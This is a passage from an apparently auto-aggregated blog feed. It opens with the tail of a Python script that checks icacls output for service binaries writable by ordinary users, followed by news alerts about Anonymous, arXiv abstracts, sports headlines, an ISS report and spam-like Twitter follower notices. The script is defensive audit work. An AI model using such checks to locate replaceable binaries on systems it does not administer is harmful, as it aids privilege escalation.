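WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "GA", "GW"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<perms>(?:\([^)]*\))+)$")

# Constructed sample: an ACL under which everyone can replace the binary.
SAMPLE_WEAK = SERVICE_BINARY + r""" Everyone:(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample: unprivileged users can only read and execute.
SAMPLE_FIXED = SERVICE_BINARY + r""" NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_aces(icacls_output, path):
    """Yield (principal, flags, rights) for each ACE in `icacls <path>` output."""
    for line in icacls_output.splitlines():
        line = line.strip()
        # The first line is prefixed with the path, which may itself contain
        # spaces and parentheses, so remove it before matching.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        tokens = [t.strip()
                  for group in re.findall(r"\(([^)]*)\)", m["perms"])
                  for t in group.split(",")]
        flags = {t for t in tokens if t in FLAG_TOKENS}
        rights = {t for t in tokens if t not in FLAG_TOKENS}
        yield m["who"], flags, rights


def writable_by_unprivileged(icacls_output, path):
    """Return [(principal, [rights])] for ACEs that let ordinary users replace the file."""
    findings = []
    for who, flags, rights in parse_aces(icacls_output, path):
        # Deny ACEs remove access; inherit-only ACEs do not apply to this object.
        if "DENY" in flags or "IO" in flags:
            continue
        hit = rights & WRITE_RIGHTS
        if who.lower() in BROAD_PRINCIPALS and hit:
            findings.append((who, sorted(hit)))
    return findings


if __name__ == "__main__":
    for label, sample in (("weak (constructed)", SAMPLE_WEAK),
                          ("fixed (constructed)", SAMPLE_FIXED)):
        print(label, writable_by_unprivileged(sample, SERVICE_BINARY))
```

The same check should be applied to the installation directory, since write access to the folder also allows the binary to be swapped.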

Source: Gmail -> IFTTT-> Blogger

Personal spaces are no longer linked and creator is anonymous

During the upgrade, for some unknown cause, all the personal space creators have changed to NULL, causing the creator to be anonymous.

from Google Alert - anonymous http://ift.tt/1P86gS9
via IFTTT

Will Anonymous's war on ISIS have any effect?

Since the Paris attacks, Anonymous claims to have taken down thousands of Twitter accounts.

from Google Alert - anonymous http://ift.tt/1QHfVz9
via IFTTT

Aurora over Clouds


Auroras usually occur high above the clouds. The auroral glow is created when fast-moving particles ejected from the Sun impact the Earth's magnetosphere, from which charged particles spiral along the Earth's magnetic field to strike atoms and molecules high in the Earth's atmosphere. An oxygen atom, for example, will glow in the green light commonly emitted by an aurora after being energized by such a collision. The lowest part of an aurora will typically occur at 100 kilometers up, while most clouds usually exist only below about 10 kilometers. The relative heights of clouds and auroras are shown clearly in the featured picture from Dyrholaey, Iceland. There, a determined astrophotographer withstood high winds and initially overcast skies in an attempt to capture aurora over a picturesque lighthouse, only to take, by chance, the featured picture along the way. via NASA http://ift.tt/1IdvuGN

The Lowdown on Anonymous

Anonymous is an amorphous group of hacktivists with no single leader or power structure. Some call them heroes, others call them criminals. Can they ...

from Google Alert - anonymous http://ift.tt/1Xe43J7
via IFTTT

"Anonymous" Needs Oversight, Coordination to Pose Real Threat

Most people on the Internet have heard of Anonymous, the vigilante hacktivist group who have attacked everybody from ISIS to..

from Google Alert - anonymous http://ift.tt/1LyA6aw
via IFTTT

thebenevolentone3

Benevolent: "Characterized by or expressing goodwill or kindly feelings" EV CLASSES OF 2014. 2015. 2016. 2017. Keep on keeping on.

from Google Alert - anonymous http://ift.tt/1Xe4280
via IFTTT

Anonymous vs ISIS, Australian attorney general, NTP and DDoS exploits

Web security news this week: Anonymous vs ISIS, Australian attorney general, NTP and DDoS exploits; Hackers offer 200000 Comcast user ...

from Google Alert - anonymous http://ift.tt/1LyA9mE
via IFTTT

Tuesday, November 24, 2015

A Survey of Signed Network Mining in Social Media. (arXiv:1511.07569v1 [cs.SI])

Many real-world relations can be represented by signed networks with positive and negative links, and signed network analysis has attracted increasing attention from multiple disciplines. With the evolution of data from offline to social media networks, signed network analysis has evolved from developing and measuring theories to mining tasks. In this article, we present a review of mining signed networks in social media and discuss some promising research directions and new frontiers. We begin by giving basic concepts and unique properties and principles of signed networks. Then we classify and review tasks of signed network mining with representative algorithms. We also delineate some tasks that have not been extensively studied with formal definitions and research directions to expand the boundaries of signed network mining.



from cs.AI updates on arXiv.org http://ift.tt/1XdDmEo
via IFTTT

Approximate Probabilistic Inference via Word-Level Counting. (arXiv:1511.07663v1 [cs.AI])

Hashing-based model counting has emerged as a promising approach for large-scale probabilistic inference on graphical models. A key component of these techniques is the use of xor-based 2-universal hash functions that operate over Boolean domains. Many counting problems arising in probabilistic inference are, however, naturally encoded over finite discrete domains. Techniques based on bit-level (or Boolean) hash functions require these problems to be propositionalized, making it impossible to leverage the remarkable progress made in SMT (Satisfiability Modulo Theory) solvers that can reason directly over words (or bit-vectors). In this work, we present the first approximate model counter that uses word-level hashing functions, and can directly leverage the power of sophisticated SMT solvers. Empirical evaluation over an extensive suite of benchmarks demonstrates the promise of the approach.



from cs.AI updates on arXiv.org http://ift.tt/1If6AGI
via IFTTT

Searching for Objects using Structure in Indoor Scenes. (arXiv:1511.07710v1 [cs.CV])

To identify the location of objects of a particular class, a passive computer vision system generally processes all the regions in an image to finally output few regions. However, we can use structure in the scene to search for objects without processing the entire image. We propose a search technique that sequentially processes image regions such that the regions that are more likely to correspond to the query class object are explored earlier. We frame the problem as a Markov decision process and use an imitation learning algorithm to learn a search strategy. Since structure in the scene is essential for search, we work with indoor scene images as they contain both unary scene context information and object-object context in the scene. We perform experiments on the NYU-depth v2 dataset and show that the unary scene context features alone can achieve a significantly high average precision while processing only 20-25% of the regions for classes like bed and sofa. By considering object-object context along with the scene context features, the performance is further improved for classes like counter, lamp, pillow and sofa.



from cs.AI updates on arXiv.org http://ift.tt/1XdDmEk
via IFTTT

Generalized Product of Experts for Automatic and Principled Fusion of Gaussian Process Predictions. (arXiv:1410.7827v2 [cs.LG] UPDATED)

In this work, we propose a generalized product of experts (gPoE) framework for combining the predictions of multiple probabilistic models. We identify four desirable properties that are important for scalability, expressiveness and robustness, when learning and inferring with a combination of multiple models. Through analysis and experiments, we show that gPoE of Gaussian processes (GP) have these qualities, while no other existing combination schemes satisfy all of them at the same time. The resulting GP-gPoE is highly scalable as individual GP experts can be independently learned in parallel; very expressive as the way experts are combined depends on the input rather than fixed; the combined prediction is still a valid probabilistic model with natural interpretation; and finally robust to unreliable predictions from individual experts.



from cs.AI updates on arXiv.org http://ift.tt/1tiGezu
via IFTTT

Context-Aware Bandits. (arXiv:1510.03164v2 [cs.LG] UPDATED)

In this paper, we present a simple and efficient Context-Aware Bandit (CAB) algorithm. With CAB we attempt to craft a bandit algorithm that can capture collaborative effects and that can be easily deployed in a real-world recommendation system, where the multi-armed bandits have been shown to perform well in particular with respect to the cold-start problem. CAB utilizes a context-aware clustering technique augmenting exploration-exploitation strategies. CAB dynamically clusters the users based on the content universe under consideration. We provide a theoretical analysis in the standard stochastic multi-armed bandits setting. We demonstrate the efficiency of our approach on production and real-world datasets, showing the scalability and, more importantly, the significantly increased prediction performance against several existing state-of-the-art methods.



from cs.AI updates on arXiv.org http://ift.tt/1ZwXM9W
via IFTTT

Ravens: QB Jimmy Clausen claimed off waivers, worked with OC Marc Trestman in Chicago in 2014; Joe Flacco placed on IR (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


software video
Software per Video editing, codec, rip
Italy
http://t.co/iyXrcyGSPV
Following: 3503 - Followers: 1066

November 24, 2015 at 03:25PM via Twitter http://twitter.com/software_video

Ravens: Baltimore (3-7) drops 1 spot to No. 30 in Week 12 NFL power rankings; open here for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Maria Gonzalo
I am a sweet girl who love men and I enjoy it when I am looked after and given flowers. I love romantic walks under the moon and night swimming naked.


Following: 790 - Followers: 104

November 24, 2015 at 01:08PM via Twitter http://twitter.com/MariaGonzal21

Boston Briefing: Pats lose two more WRs; Danny Ainge talks Celts' season; Hanley Ramirez's winter plan; Bruins win in SO (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] List of Bug Bounty Programs INTERNATIONAL 427+ OFFICIAL - Bug Bounty Sheet

Title: List of Bug Bounty Programs INTERNATIONAL 427+ OFFICIAL - Bug Bounty Sheet

Program Counts: Public (427+) & Silent (06)

URL: http://ift.tt/1PLTNU7

Information: The "list of bug bounty" covers 426+ international security programs worldwide: commercial programs like bug bounty or reward systems, but also regular security acknowledgments. The table list provides 5 item categories. The first list shows the last 10 entries and the second list shows the full list of bug bounty programs. Feel free to send us new updates and contribute to the public bug bounty-, security acknowledgment- or reward- programs list.

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Louise Webster



Following: 408 - Followers: 111

November 24, 2015 at 07:29AM via Twitter http://twitter.com/LouiseWebster22

ISS Daily Summary Report – 11/23/15

Microgravity Science Glovebox (MSG) Troubleshooting:  Kelly and Lindgren attempted to restore full functionality to the slide mechanism that allows the MSG work volume to be extended for crew access but were not successful.  The MSG Ground Team is working with a ground unit to develop additional procedures for correcting the problem.  The slide mechanism initially malfunctioned last Tuesday, November 17th.   EXPRESS (EXpedite the PRocessing of Experiments to Space Station) Rack 7 Laptop Software Load:  Yui supported the ongoing software updates to ISS EXPRESS Rack laptops by copying a software load to the EXPRESS Rack 7 laptop.  These software updates include enhanced security with the Windows 7 operating system, new features and support for new capabilities.   Biological Rhythms 48 Hours:  Lindgren donned the Holter Electrocardiogram to support JAXA’s Biological Rhythms 48 Hours investigation.  He then synchronized data between the Actiwatch and Holter.  This investigation studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS schedule follows Greenwich Mean Time (GMT), it is not known whether a separate biological rhythm is imposed on long-term flight crews. To study this, astronauts wear an Actiwatch for 96 hours and a Holter electrocardiograph for 48 hours.   Intracranial Pressure and Visual Impairment (IPVI):  For JAXA’s IPVI investigation, Lindgren took front and side photos of his face with a USB camera attached to the Medical Laptop.  He then participated in a conference with the ground to discuss any current medical conditions and upcoming IPVI operations.  Long-duration spaceflight may cause an elevation of intracranial pressure (ICP), resulting in changes in the optic nerve and ocular structure. 
The aim of this study is to non-invasively estimate the changes in intracranial pressure and brain circulation induced by long-duration spaceflights, by analyzing the arterial blood pressure and brain blood flow waveforms before and after space flight.  In addition, researchers hope to correlate the occurrence of abnormalities of the eye (e.g. optic disc edema) with ISS crewmembers experiencing an increase in intracranial pressure.   Veggie (Veg-01):  Kelly thinned seedlings today so that each Veg-01 Plant Pillow has one plant, and then refilled the pillows with water.  The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Story Time From Space:  Yui read “Atmospheres and Telescopes” from the book Max Goes to the Moon,” discussed the subject on camera, and demonstrated the scientific principles involved. Video recording of the activity will be downlinked to the ground and used for educational purposes.   Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max:  For his Return minus 30 day (R-30) Sprint VO2 session, Yui attached Electrocardiogram (ECG) electrodes to himself, set up and donned Heart Rate Monitor hardware, performed Portable Pulmonary Function System calibrations, and then performed the VO2 protocol.  The Sprint VO2 investigation evaluates the use of high intensity, low volume exercise to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers while reducing total exercise time during long-duration space missions.   Fine Motor Skills:  Kelly completed a session of the Fine Motor Skills experiment.  During the experiment he performed a series of interactive tasks on a touchscreen tablet. 
This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.  Kelly’s results will also be compared with a closely matched participant on Earth.   Cygnus/Orbital ATK (OA)-4 Preps:  Kelly, Yui, and Lindgren participated in a conference with Robotics Ground Controllers to discuss rendezvous operations for the OA-4 flight.  Following the conference, the crew completed a procedure review and then Kelly and Lindgren performed a Computer Based Training session.   Russian Joint Research (RJR) Microbiological Sampling:  On Saturday, Kornienko used the Microbial Air Sampler (MAS) and Surface Sample Kit (SSK) to take surface and air samples in the ISS to support a microbiological assessment of the ISS.  These activities are performed as part of a joint cooperative research program between NASA and the Russian Space Agency. The results of incubation and analysis of these samples will be used to identify ISS locations and surfaces prone to microbial contamination and will provide a scientific basis for decisions about future microbial monitoring on ISS and on future spacecraft used for human exploration.   Cognition:  Lindgren performed his Flight Day 122 session of the Cognition experiment on Saturday.  The Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) investigation is a battery of tests that measure how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. 
Cognition includes ten brief computerized tests that cover a wide range of cognitive functions, and provides immediate feedback on current and past test results. The software used allows for real-time measurement of cognitive performance while in space.   Journals:  Kelly completed a Journals entry on Saturday. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used during astronauts during extended-duration missions. Study results provide information used in preparation for future missions to low-Earth orbit and beyond.   Water Processing Assembly (WPA) Fault:  Over the weekend on Saturday, WPA experienced a fault associated with the pre-heater in the Catalytic Reactor unit not staying above the required temperature.  Ground Teams assessed then modified temperature limits in order to allow WPA operations to continue, while longer term plans are discussed.   Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement IPVI – Photography […]

from ISS On-Orbit Status Report http://ift.tt/1lfD7Y3
via IFTTT

I have a new follower on Twitter


Sara Calderon



Following: 336 - Followers: 59

November 24, 2015 at 07:23AM via Twitter http://twitter.com/Sara19Calderon

I have a new follower on Twitter


Betty Young



Following: 821 - Followers: 123

November 24, 2015 at 07:18AM via Twitter http://twitter.com/Betty4Young

Hacker Claims He helped FBI Track Down ISIS Hacker (Who was killed in Drone-Strike)

Remember Junaid Hussain? Junaid Hussain – a hacker turned ISIS cyber mastermind who was killed in a US drone strike in August this year. But something has emerged what we don't know about the death of Hussain. The infamous hacker who in the past hacked the Anonymous pseudo-official Twitter accounts, now claims he served as an FBI informant to help the US government track down Junaid


from The Hacker News http://ift.tt/1Tc1W2A
via IFTTT

I have a new follower on Twitter


Norma Jones



Following: 387 - Followers: 108

November 24, 2015 at 07:05AM via Twitter http://twitter.com/NormaJones21

I have a new follower on Twitter


Eleana García



Following: 397 - Followers: 104

November 24, 2015 at 07:05AM via Twitter http://twitter.com/GarciaEleana20

I have a new follower on Twitter


Kathy Youmans



Following: 345 - Followers: 90

November 24, 2015 at 06:59AM via Twitter http://twitter.com/KathyYoumans21

I have a new follower on Twitter


Gloria Boolman



Following: 395 - Followers: 118

November 24, 2015 at 06:59AM via Twitter http://twitter.com/BoolmanGloria

I have a new follower on Twitter


Holly Gerald



Following: 421 - Followers: 98

November 24, 2015 at 06:45AM via Twitter http://twitter.com/HollyGerald

I have a new follower on Twitter


Paris Gilmore



Following: 673 - Followers: 87

November 24, 2015 at 06:33AM via Twitter http://twitter.com/ParisGilmore21

I have a new follower on Twitter


Susan Dyson



Following: 405 - Followers: 103

November 24, 2015 at 06:33AM via Twitter http://twitter.com/Susan21Dyson